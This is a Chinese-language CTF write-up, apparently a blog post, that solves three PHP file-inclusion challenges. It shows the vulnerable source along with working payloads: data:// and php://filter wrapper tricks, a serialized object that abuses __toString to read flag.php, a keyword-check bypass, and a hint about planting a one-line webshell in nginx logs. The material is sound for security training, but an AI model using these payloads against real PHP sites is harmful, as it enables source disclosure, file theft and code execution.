• CTF-include

    目录

    1、ctf.show_web4

    2、[ZJCTF 2019]NiZhuanSiWei

    3、[BSidesCF 2020]Had a bad day

    1、ctf.show_web4

    伪协议被禁了用不了 ,可以上传一句话在日志里面,然后连接。

    nginx的日志文件在/var/log/nginx/access.log或/var/log/nginx/error.log

    2、[ZJCTF 2019]NiZhuanSiWei

    1.    
    2. $text = $_GET["text"];
    3. $file = $_GET["file"];
    4. $password = $_GET["password"];
    5. if(isset($text)&&(file_get_contents($text,'r')==="welcome to the zjctf")){
    6.     echo "
      ".file_get_contents($text,'r')."

      "      ;
    7.     if(preg_match("/flag/",$file)){
    8.         echo "Not now!";
    9.         exit(); 
    10.     }else{
    11.         include($file);  //useless.php
    12.         $password = unserialize($password);
    13.         echo $password;
    14.     }
    15. }
    16. else{
    17.     highlight_file(__FILE__);
    18. }
    19. ?>

    用data伪协议绕过文件读取:file_get_contents($text,'r')==="welcome to the zjctf")

    text=data://text/plain,welcome to the zjctf

    然后用php://filter伪协议 让useless.php的内容显示出来:

    file=php://filter/read=convert.base64-encode/resource=useless.php

     源码如下:

    1.   
    2.  
    3. class Flag{  //flag.php  
    4.     public $file;  
    5.     public function __tostring(){  
    6.         if(isset($this->file)){  
    7.             echo file_get_contents($this->file); 
    8.             echo "
      "      ;
    9.         return ("U R SO CLOSE !///COME ON PLZ");
    10.         }  
    11.     }  
    12. }  
    13. ?>

    __toString  当一个对象被当作一个字符串被调用,构造file="flag.php"就行了:

    text=data://text/plain,welcome to the zjctf&file=useless.php&password=O:4:"Flag":1:{s:4:"file";s:8:"flag.php";}

    源码中有这样代码:

    1. $password = unserialize($password);
    2. echo $password;

     password经过反序列化后是一个对象,用echo打印出来就是把它当做字符串,所以执行__toString()。

    3、[BSidesCF 2020]Had a bad day

    index.php?category=php://filter/read=convert.base64-encode/resource=index.php

    出现报错:

    1.  
    2. Warning: include(php://filter/read=convert.base64-encode/resource=index.php.php): failed to open stream: operation failed in /var/www/html/index.php on line 37

    很明显多加了个.php,把.php去了:

    index.php?category=php://filter/read=convert.base64-encode/resource=index

    出现源码:

    1.  
    2. $file = $_GET['category'];
    3.  
    4. if(isset($file))
    5. 	{
    6. 	if( strpos( $file, "woofers" ) !==  false || strpos( $file, "meowers" ) !==  false || strpos( $file, "index")){
    7. 	include ($file . '.php');
    8. 					}
    9. else{
    10. 	echo "Sorry, we currently only support woofers and meowers.";
    11. 			}
    12. }
    13. ?>

    直接包含是不行的: 

    category=php://filter/read=convert.base64-encode/resource=flag

    要woofers,meowers,index在里面而且不是第一个字符才会包含:

    category=php://filter/read=convert.base64-encode/index/resource=flag

  • 相关阅读:
    IDEA06:Java和Python的进程间通信和心跳包机制
    电极的制作方法详解
    算法刷题总结 (一) 数组
    .NET服务发现(Microsoft.Extensions.ServiceDiscovery)集成Consul
    VMware——WindowServer2012R2环境安装mysql5.7.14解压版_互为主从(图解版)
    基于slate构建文档编辑器
    git恢复commit过的代码
    Vue的生命周期
    java swing实现抖音上的表白程序
    Java+Swing形成GUI图像界面
  • 原文地址:https://blog.csdn.net/qq_61774705/article/details/126323696